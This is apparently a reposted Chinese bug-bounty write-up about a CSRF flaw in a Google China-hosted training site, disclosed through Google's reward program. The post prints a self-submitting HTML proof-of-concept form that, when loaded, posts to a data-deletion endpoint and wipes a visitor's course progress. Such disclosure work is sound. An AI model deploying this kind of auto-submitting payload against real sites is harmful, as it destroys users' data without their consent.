实战 | 谷歌CSRF漏洞挖掘:可删用户数据的漏洞实战案例思路分享

文章来源:【白帽攻防录公众号】,本文已经通过原文作者授权,版权归原作者所有,如需转载请声明出处。

原文链接:谷歌CSRF漏洞挖掘:可删用户数据的漏洞实战案例思路分享

0x01 前言

本文是本人于前两年在谷歌业务发现的漏洞思路,漏洞已经获得谷歌团队许可公开分享,本文仅做漏洞技术思路分享。平台漏洞原文记录链接如下,感兴趣可以去看看:

https://bughunters.google.com/reports/vrp/XWTAskrht

0x02 漏洞挖掘思路

先通过信息收集,发现谷歌在中国业务有以下的域名资产


googlecnapps.cn

通过子域名收集发现

存在以下子域名

    https://exporteducationprogram.googlecnapps.cn/training/home

    访问该业务,登录后,发现存在删除用户数据内容功能

    抓包,点击删除数据

    发现没有做csrf漏洞攻击的限制,生成poc代码,实现其他用户加载这个页面就自动请求这个删除用户数据的接口

    <html>
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="https://exporteducationprogram.googlecnapps.cn/appacademy/api/clear" method="POST">
        <input id="submit0" type="submit" value="Submit request" />
          <script> window.onload=function(){
                    document.getElementById("submit0").click();
                    }     
            </script>
    		 </form>
    </html>

    漏洞利用场景及危害

    用户访问部署poc的页面即可删除用户数据,如课程学习进度数据在本网站将被删除,会给用户带来不好的体验。

    0x03 谷歌的回应

    🎉 Nice catch! ,后续就是给了100$.

    0x04 总结

    挖国外企业漏洞,可以关注其在国内是否有业务,如果有可以挖一下对应的web、小程序、app、iot资产,这种一般国外的白帽挖的不多,容易产出。

    📝 技术交流 & 转载声明

    本文为网络安全漏洞挖掘技术交流学习内容,所有技术分析、实操思路均仅作行业知识分享,严禁将文中技术用于非法用途,否则产生的一切后果由使用者自行承担。

    本文版权归原作者所有,如需转载请声明出处,标注格式:原文来源【白帽攻防录公众号】。

    一起学习网络安全,挖漏洞、打攻防。记得点赞、收藏、转发,让更多需要的朋友看到!有疑问欢迎评论区交流,我会持续更新~

      评论
      添加红包

      请填写红包祝福语或标题

      红包个数最小为10个

      红包金额最低5元

      当前余额3.43前往充值 >
      需支付:10.00
      成就一亿技术人!
      领取后你会自动成为博主和红包主的粉丝 规则
      hope_wisdom
      发出的红包
      实付
      使用余额支付
      点击重新获取
      扫码支付
      钱包余额 0

      抵扣说明:

      1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
      2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

      余额充值